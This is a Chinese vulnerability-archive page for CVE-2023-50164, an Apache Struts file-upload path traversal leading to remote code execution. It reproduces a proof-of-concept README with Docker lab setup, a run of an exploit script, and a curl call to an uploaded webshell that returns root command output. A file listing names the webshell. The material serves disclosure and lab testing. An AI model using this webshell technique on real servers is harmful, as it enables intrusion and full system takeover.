关联漏洞
标题:
Apache Struts 安全漏洞
(CVE-2023-50164)
描述:Apache Struts是美国阿帕奇(Apache)基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 Apache Struts 存在安全漏洞,该漏洞源于file upload参数存在路径遍历漏洞。攻击者可利用该漏洞上传恶意文件并执行远程代码。受影响的产品和版本:Apache Struts 2.0.0至2.5.32版本,6.0.0至6.3.0.1版本。
描述
CVE-2023-50164 (Apache Struts path traversal to RCE vulnerability) - Proof of Concept
介绍
# CVE-2023-50164 (Apache Struts path traversal to RCE vulnerability) - Proof of Concept
This PoC has been made to test an RCE (Remote Code Execution) by exploiting the Apache Struts2 vulnerability.
Build the image and run a container:
```console
$ DOCKER_BUILDKIT=1 docker build . -t struts2-rce-poc && docker run --rm -p 8080:8080 struts2-rce-poc
```
Run the exploit:
```
$ cd exploit
$ ./exploit.sh
```
Now you can executy arbitrary commands on server side as showed:
```
$ curl http://localhost:8080/webshell/webshell.jsp\?cmd\=id%20-a
uid=0(root) gid=0(root) groups=0(root)
```
## Credits
- Thanks to @jakabakos for an example of vulnerable application (https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCE)
- Thanks to Zscaler ThreatLabz (https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-50164-apache-struts-path-traversal-and-file) for the diagram here above
文件快照
[4.0K] /data/pocs/a7b254a32dc67fffcd1600ccff2891524fcae2d9
├── [ 347] Dockerfile
├── [4.0K] exploit
│ ├── [ 132] exploit.sh
│ └── [ 527] webshell.jsp
├── [4.0K] img
│ └── [422K] 1.png
├── [4.7K] pom.xml
├── [ 930] README.md
└── [4.0K] src
└── [4.0K] main
├── [4.0K] java
│ └── [4.0K] it
│ └── [4.0K] sunnyvale
│ └── [4.0K] struts2rcepoc
│ └── [1.8K] Upload.java
├── [4.0K] resources
│ └── [ 874] struts.xml
└── [4.0K] webapp
├── [ 189] index.html
└── [4.0K] WEB-INF
├── [ 578] error.jsp
├── [ 599] success.jsp
├── [ 569] upload.jsp
└── [ 779] web.xml
11 directories, 13 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。